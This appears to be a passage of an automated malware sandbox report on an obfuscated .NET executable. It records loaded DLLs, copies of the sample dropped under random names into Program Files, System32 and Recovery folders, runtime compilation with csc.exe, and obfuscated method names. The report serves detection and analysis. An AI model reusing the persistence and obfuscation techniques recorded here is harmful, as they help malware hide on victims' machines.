                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: windowscodecs.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ntmarta.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: dpapi.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: secur32.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: schannel.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: mskeyprotect.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ntasn1.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ncrypt.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: ncryptsslp.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: msasn1.dll
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe Section loaded: gpapi.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe Section loaded: mscoree.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe Section loaded: apphelp.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe Section loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe Section loaded: version.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: version.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\r6Lr6XbTWt.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Sidebar\5a424686c5d9ea
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Windows Portable Devices\7252974aa180da
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Directory created: C:\Program Files\Microsoft\b730a2198d720a
Source: VQdUvAQ4xO.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: VQdUvAQ4xO.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: VQdUvAQ4xO.exe | Static file information: File size 2005504 > 1048576
Source: VQdUvAQ4xO.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1e9200
Source: VQdUvAQ4xO.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.pdb source: VQdUvAQ4xO.exe, 00000000.00000002.1853838572.00000000031CB000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.cs | .Net Code: Type.GetTypeFromHandle(ciXfN6tqmX8b1O3iOug.TicScUf9WCb(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ciXfN6tqmX8b1O3iOug.TicScUf9WCb(16777245)),Type.GetTypeFromHandle(ciXfN6tqmX8b1O3iOug.TicScUf9WCb(16777259))})
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dj5thqfb\dj5thqfb.cmdline"
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9B7047DB push es; iretd 0_2_00007FFD9B7047E1
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9B70478C push ebp; iretd 0_2_00007FFD9B704792
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9B7055C6 push ebp; iretd 0_2_00007FFD9B7055D8
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9BB01D5E push ebx; ret 0_2_00007FFD9BB01D5F
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Code function: 0_2_00007FFD9BB024E1 push ds; ret 0_2_00007FFD9BB024EE
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 20_2_00007FFD9B6F47DB push es; iretd 20_2_00007FFD9B6F47E1
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 20_2_00007FFD9B6F478C push ebp; iretd 20_2_00007FFD9B6F4792
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Code function: 20_2_00007FFD9B6F55C6 push ebp; iretd 20_2_00007FFD9B6F55D8
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B7354B1 pushfd ; iretd 30_2_00007FFD9B7354F1
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B747510 push ebx; iretd 30_2_00007FFD9B74756A
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B747528 push ebx; iretd 30_2_00007FFD9B74756A
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B71478C push ebp; iretd 30_2_00007FFD9B714792
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B7147DB push es; iretd 30_2_00007FFD9B7147E1
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B7155C6 push ebp; iretd 30_2_00007FFD9B7155D8
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B728C52 pushfd ; iretd 30_2_00007FFD9B728C53
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 30_2_00007FFD9B721A66 push ecx; iretd 30_2_00007FFD9B721A6C
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 32_2_00007FFD9B71478C push ebp; iretd 32_2_00007FFD9B714792
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 32_2_00007FFD9B7147DB push es; iretd 32_2_00007FFD9B7147E1
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Code function: 32_2_00007FFD9B7155C6 push ebp; iretd 32_2_00007FFD9B7155D8
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B708C52 pushfd ; iretd 33_2_00007FFD9B708C53
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B701A66 push ecx; iretd 33_2_00007FFD9B701A6C
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B6F47DB push es; iretd 33_2_00007FFD9B6F47E1
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B6F478C push ebp; iretd 33_2_00007FFD9B6F4792
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B6F55C6 push ebp; iretd 33_2_00007FFD9B6F55D8
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B727580 push ebx; iretd 33_2_00007FFD9B72756A
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B727510 push ebx; iretd 33_2_00007FFD9B72756A
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B727528 push ebx; iretd 33_2_00007FFD9B72756A
Source: C:\Recovery\0eDO5Zbs.exe | Code function: 33_2_00007FFD9B7154B1 pushfd ; iretd 33_2_00007FFD9B7154F1
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 34_2_00007FFD9B6E47DB push es; iretd 34_2_00007FFD9B6E47E1
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 34_2_00007FFD9B6E478C push ebp; iretd 34_2_00007FFD9B6E4792
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Code function: 34_2_00007FFD9B6E55C6 push ebp; iretd 34_2_00007FFD9B6E55D8
Source: VQdUvAQ4xO.exe | Static PE information: section name: .text entropy: 7.570960606064103
Source: mENvqiIeFx.exe.0.dr | Static PE information: section name: .text entropy: 7.570960606064103
Source: 0eDO5Zbs.exe.0.dr | Static PE information: section name: .text entropy: 7.570960606064103
Source: r6Lr6XbTWt.exe.0.dr | Static PE information: section name: .text entropy: 7.570960606064103
Source: JOajDppbSkfqSPK1G9zAbH.exe.0.dr | Static PE information: section name: .text entropy: 7.570960606064103
Source: VQdUvAQ4xO.exe, Aj7hYqFSqj69oOYBolh.cs | High entropy of concatenated method names: 'BQTFwRsQQ7', 'JI9FchMbWK', 'NduF3Rw53F', 'K77FAtWOWk', 'L35FYptfwa', 'KNUFFenqCT', 'dHAF1lWwFx', 'D4KFyLxDLO', 'YY5F8CIg8F', 'VQmFIjiPsV'
Source: VQdUvAQ4xO.exe, qIbqruFqaSOJk8LRZM8.cs | High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'lhGlicHkCGOrFqbpbcnY', 'NB02m9Hk2rsirkExQeoQ', 'jWjFGuHkbg3AsJNs79RK', 'MwlOMaHkn6m7n7gBEgMs'
Source: VQdUvAQ4xO.exe, RcOytGY90HmlQRYkluS.cs | High entropy of concatenated method names: 'f8pYuwweL8', 'pXPFUAHk3eNDDo4lWs40', 'gK12sYHkwHhy9H2UITjA', 'vAyuelHkcDiyagBMYdt9', 'akLMFhHkA6T35x2RYpQA', 'viswvHHkYxFCR1OwEpWA', 'P9X', 'vmethod_0', 'iK8HwhnCrjx', 'imethod_0'
Source: VQdUvAQ4xO.exe, qDH1wJLFHoxO5yjGxpG.cs | High entropy of concatenated method names: 'C3yLExDw4l', 'roj0KkHdehG2qMesLnc9', 'j5mUXxHdiVfCfbBCqj2h', 'nstfSNHdaQuw3b8RhcLJ', 'pXDAcfHdoIlSL7EkpU53', 'YVvFyyHddVF1789CZ0TR', 'IPy', 'method_0', 'method_1', 'method_2'
Source: VQdUvAQ4xO.exe, RDllJ1RykikWrbtXH0e.cs | High entropy of concatenated method names: 'Rrr', 'y1x', 'T2EHY6k9q1M', 'HQkHYsdwgON', 'OZO4cNHfgKkO9EUuwYHq', 'jxtecGHfLH3hQdKni6o3', 'ShiCLBHfMyEu3tVrKXb5', 'xSAUBGHfrwFPRRjO3GQI', 'D6wxofHffVZNx8p9nESY', 'm8foyPHfm38T7VGO1kJc'
Source: VQdUvAQ4xO.exe, QkGBm9VdXdrhFcmMBNf.cs | High entropy of concatenated method names: 'wGcVGfmlEg', 'HLeVuqJv2E', 'hIVV7qUWUD', 'oBVVPkcd9Z', 'qclVtbhuyF', 'QMapV4HKVMxFgkuRGkPO', 'MlyZXiHK0siH0y5q1XNu', 'HSaMMjHKhbxfj6jLiFi7', 'LcCPaKHKp0eVMLhG7vdT', 'yN9axXHKJgL8yIweBSep'
Source: VQdUvAQ4xO.exe, MdPAjiUoC9pBAJgfdG4.cs | High entropy of concatenated method names: 'o7vHYjKOFYp', 'c1hUiZO7d5', 'EKZHYNAjZUe', 'APHhg0Hf1eOJ9XmHq2I5', 'UDJ4COHfyoBf0oxXxMd4', 'aXnkGVHfYstoBq1l6Ebl', 'sck7S4HfFvJaZEKtgHSe', 'XQhCkmHf8qKIvmAl42Oy', 'NlAWXIHfI3cVKJaigr7F'
Source: VQdUvAQ4xO.exe, NuPqB04iNtErnWZsMuX.cs | High entropy of concatenated method names: 'tdp4QiFdWv', 'QLo4GGAING', 'Moi4uNJxtF', 'inH47J00gh', 'Qke4P8i1VB', 'xx1gUcHXOrAGSMXByhp7', 'yAF6xXHXnwY0wAEgn2KN', 'QXD55WHXkDqOjoHB2jVt', 'cIuSGBHXgRYpQtWdcbsn', 'KlekhNHXLXddPTqAA6pd'
Source: VQdUvAQ4xO.exe, ovx7777NkOk92DBATbY.cs | High entropy of concatenated method names: 'ybNqO0HPKRC1b0WqW3Ig', 'KMlUtNHPaJwogE0b16yW', 'uQIPQGAHY3', 'B8u56YHPdbLr2UEFqskd', 'jLSwxvHPQqQj7TXB4kU9', 'RVFgu1HPGvylnFDykVKU', 'iNuIe2HPuEMbYt99L74y', 'KXY4PEHP7PWWPdnbe5lr', 'Mx441xHPPrk9tuUOqw9s', 'nYLbZDHPt0yYbH14lbn5'
Source: VQdUvAQ4xO.exe, cHitvuleQgR9nCgPSZ8.cs | High entropy of concatenated method names: 'O0BwllD2Wo', 'WupwwlQYyK', 'P8TwcyGLZf', 'p5GaxLHJF51EQNwtqNiT', 'A77pdrHJABcpLkxHpRgy', 'axWZyvHJYB7ydhFejwJ9', 'DLjwyrOHhK', 'F3nNGbHJIjHDIlJgbu7p', 'Mo6jGuHJykU7ZwR3PT1S', 'nOvdymHJ8vwYs22KVDMa'
Source: VQdUvAQ4xO.exe, jopMKQ3fZcqknogkoe3.cs | High entropy of concatenated method names: 't3O3uvmFyS', 'aHD37uJvKq', 'KQb3PRYIQu', 'I9u8WGHbcChXR1CGPJ0M', 'zC3eQwHblUcayQqBGvXf', 'QvQUYKHbw2inbSrdRux3', 'PDf3XetVA1', 'MsK35QsLos', 'gFq397uuDo', 'P323KLHOQO'
Source: VQdUvAQ4xO.exe, JC5geYHT01ctyeDikXw.cs | High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'BjVHYHNw0Bo', 'h0aHwHCk5w6', 'KaNSJdHVS45Tqs3SqF1y', 'h2qOtFHVloMTJUhf3YgY', 'ijJd7PHVwJ4rhOn33qyx', 'GlqcMTHVcnJvRuyjkWEP'
Source: VQdUvAQ4xO.exe, WRGt3tcXWkLwsIscp8T.cs | High entropy of concatenated method names: 'BEhcoHEgiU', 'PWEEmJH236NGuBlvHuNj', 'h4GdwTH2A3R5mq053vos', 'r56lQCH2YZbuHctJESHv', 'U1J', 'P9X', 'xT1HwDGxljq', 'TpmHwjBiFrC', 'p5qHYAEA1SB', 'imethod_0'
Source: VQdUvAQ4xO.exe, k9ecEIuI85ifNiC7AsE.cs | High entropy of concatenated method names: 'iLOuD4AtNx', 'jiauxt5b6A', 'oGOu65knkd', 'mFpus8TZaS', 'udGu45jZCQ', 'pksuEsP7fP', 'ODquv6hBkY', 'kjBu0kVx3l', 'Dispose', 'FLQcfAH7ohPbkOjd7nmX'
Source: VQdUvAQ4xO.exe, naTgsZEbW7HZBPjqufX.cs | High entropy of concatenated method names: 'jV8EkoQCvj', 'LRRfdmHXtWaYoOyOUmZb', 'cEoPQ5HXT7pIrbbhfvHW', 'An7qYdHXzD0akFf5Bq36', 'hTiyI1H5B3m9ouMMwUgI'
Source: VQdUvAQ4xO.exe, JyIasnRHQ24Vj5cslmc.cs | High entropy of concatenated method names: 'rC9', 'method_0', 'NYNHYxBnMkH', 'HwtHYUM4n3s', 'LVKT9CHf6uZdtgYWBasB', 'q7Fv6IHfsFxRtqQSeqE9', 'ggEoj0Hf4tMEkP6GLI6x', 'YlPRYlHfETeNctI0ZCMA', 'fUsLt5HfvqXwewpVdyp2', 'jQpm9QHf0hAAoOPkictS'
Source: VQdUvAQ4xO.exe, mBGLLCCYnT12ieI43PS.cs | High entropy of concatenated method names: 'pBrC1WeBsy', 'PgJCyhenwp', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'XRRC8MhfXn', 'method_2', 'uc7'
Source: VQdUvAQ4xO.exe, FxNBUnAxYDjKtrdOhhG.cs | High entropy of concatenated method names: 'NKAAVmxBc5', 'WBpZ4PHbfuscm5eO4O22', 'NpEFaEHbMlvVJGtt6yOJ', 'AK24J7HbrNiff3VkVqbl', 'rRqB87HbmNRsdhkbstxT', 'zJpARlRjof', 'NB0A6Sf8gK', 'js1AsSEoVv', 'yOmA4QoL2K', 'WXVU2mHb2U6TkWMiPFmK'
Source: VQdUvAQ4xO.exe, ycBtraACpm89422Xygt.cs | High entropy of concatenated method names: 'VA1AbeoriW', 'RrBAnSmASs', 'MMZsn8Hb5QRiqY878hr0', 'gFqTm9Hb9C1d4FrO6VqV', 'WELS0SHbK64pb1QXV7tq', 's4BZDGHbaadkJx4LDV2q', 'Lar3RBHboQZtITtedCCc', 'cemEnBHbeYys0yJR3mq0', 'Raji0qHbitySBBlCBtU4'
Source: VQdUvAQ4xO.exe, nq1fFcbehhKkyfHOk4U.cs | High entropy of concatenated method names: 'sWHbdVh3UO', 'k6r', 'ueK', 'QH3', 'MutbQ3MchS', 'Flush', 'lD8bGRvUhe', 'bsKbu8staN', 'Write', 'jZNb7PkFx8'
Source: VQdUvAQ4xO.exe, mmMRh6Y1LWv9Q2RbPLA.cs | High entropy of concatenated method names: 'WVAY8sT3d5', 'JMEYICRjwc', 'MrUYq9VHVp', 'bvF2LKHnNSNZTGGyvYY8', 'R8LbANHnDZJntJ5RbxgE', 'k3WLOwHnj1pxAlfFqepX', 'Co6mKuHnZ4OCltjQxdB7', 'ppsInGHnxL7CoBknJ4qn', 'H7C90FHnU6oDp2GGRwHn', 't5ZXi2HnR2cLFAWixFI9'
Source: VQdUvAQ4xO.exe, YSKpBmSeRKlq4jEN5yZ.cs | High entropy of concatenated method names: 'rEllAZwYYk', 'waIP5jHpw2aZDt08jZff', 'r1IfaLHpcFf01aNhOIPg', 'J4xCEpHp3iZC68pvZysj', 'GsbBrmHpSqmEjm68SBq4', 'WwC0toHplkoyEsfmpY35', 'Wl1uHcHpAyOlkwJegBT8', 'WrgBVcHpY6Kr8RP9iSdH', 'BvWlBW06qD', 'pSblSjBJw0'
Source: VQdUvAQ4xO.exe, GdvWYyHqjZRr6jSFRK3.cs | High entropy of concatenated method names: 'FurHDyBmr7', 'dpYHjl1IOE', 'GNiHN1Pfw6', 'oRxMKNHhZ0EocEWobhG8', 'IWD8qUHhjtaXovVTGgn5', 'gnhkL3HhNcvBRiLGP9iF', 'oQ723oHhxYP1I5GVCtWk', 'gXsIBlHhUU8lLnmCyNvJ', 'cEVYAEHhRA5dRRInVId9'
Source: VQdUvAQ4xO.exe, CfYaj5YhA5tBli5e96m.cs | High entropy of concatenated method names: 'wVbYpBTlfn', 'PdgYJ5SVQk', 'eEpYCEMcHO', 'ILJY2suwMw', 'sx8YbfZ3nB', 'QACYnIMiAB', 'PDByyuHn9ajRRC246X6p', 'mou3lDHnK1MGcA6cWKGA', 'v1Np4XHnaNrmrNBJ2Dfg', 'F2fxlNHnoRL6rchkamug'
Source: VQdUvAQ4xO.exe, AM9r3nLCmdaDAF3q1NH.cs | High entropy of concatenated method names: 'zIdLbTC3R8', 'NdULnavxCI', 'yJVLkd020S', 'de2LO9Jwdh', 'KxCLgJw07Z', 'tfALLRX8N6', 'VOpLMpc3Vu', 'FjcLrI6lGG', 'g0ILfHWQio', 'XNALmRPOFK'
Source: VQdUvAQ4xO.exe, lwdyFYtZpN7dWKulhWw.cs | High entropy of concatenated method names: 'btjtpdAbaA', 'zWStJhlFMJ', 'SFrtCCFwex', 'CC6t22fIaf', 'OiOtbqJ11y', 'M1itnppaTF', 'mButk8tHDE', 'B9atO3hZdV', 'oVytg1Gown', 'LQ8tLHfqW9'
Source: VQdUvAQ4xO.exe, Na9tQLAFYhd7UscfDtO.cs | High entropy of concatenated method names: 'l5eAyLQ5Ci', 'B1hA8HlMNd', 'lfPidmHbWXHbHf45e7lq', 'g1gwuUHbI3Z8xiNXQAX4', 'NH5Q4IHbqdhVwSpCu06g', 'DIRYLQHbDlqFg5cvMijt', 'e2q30DHbjAb5YdfGnpBE', 'wLpWRJHbNXw8qvsYLjNA', 'BKeNJBHbZd62vo6TMXxc', 'YFKBPYHbxT8Ci1SpYgkf'
Source: VQdUvAQ4xO.exe, XnQyNTzGApX2rAKuOh.cs | High entropy of concatenated method names: 'WOHHHy7rHJ', 'AAlHl4T5a5', 'cnUHwBs9sb', 'ijIHcPKI7j', 'F40H3um0hQ', 'PyGHAPaiui', 'heTHFZ0OCV', 'vR4tfCHhYR5YQZTINNiu', 'igq7MhHhFXtMv06ilYBd', 'f9K91DHh16OmVhQLLpuZ'
Source: VQdUvAQ4xO.exe, Tfs5UeSUo5yS3iOiX2b.cs | High entropy of concatenated method names: 'Ks9S6Xtt8G', 'zlASs4LcnJ', 'AmRff5HVVkWsiTwE9ave', 'Y5JOZFHVpHWhHlrDEvIR', 'pYLvepHVJXpVx6SCm47A', 'XOTxwWHVCuJ4FYBdyrVF', 'MWgk5vHV28JhL5d6NHhV', 'np951ZHVbFQikKvG1F7Z', 'YBPFJvHVn4MHVvlM7toj'
Source: VQdUvAQ4xO.exe, bpMfE56IOVOCoI0aQbH.cs | High entropy of concatenated method names: 'gbP4HZBI9R', 'dBr5H4HX8miYPK911yet', 'xCOD7eHX1HcPZmgasdvt', 'i6fAnSHXyyEAacfCBqns', 'zcasVjHXIMSDZewefVBf', 'DbM6WVrfpb', 'bxa6D0iO5m', 'Eug6jGI8Nh', 'AKJ6NWjuU3', 'BYA6Zt1QKR'
Source: VQdUvAQ4xO.exe, AFZrvHVTqVH9bJHerlh.cs | High entropy of concatenated method names: 'pVbpB4E6ww', 'ffMpHGJqyk', 'QwfpSteBtw', 's4nplALYTf', 'WIDpwbtBNe', 'D4vpcPHEi0', 'oShWlfHKgtooRVbPMGem', 'eQmiqLHKkhj3Kb7UBmUT', 'HCto5NHKO8VsldpmQePd', 'mRZ6v6HKL7J2iXxSLg5q'
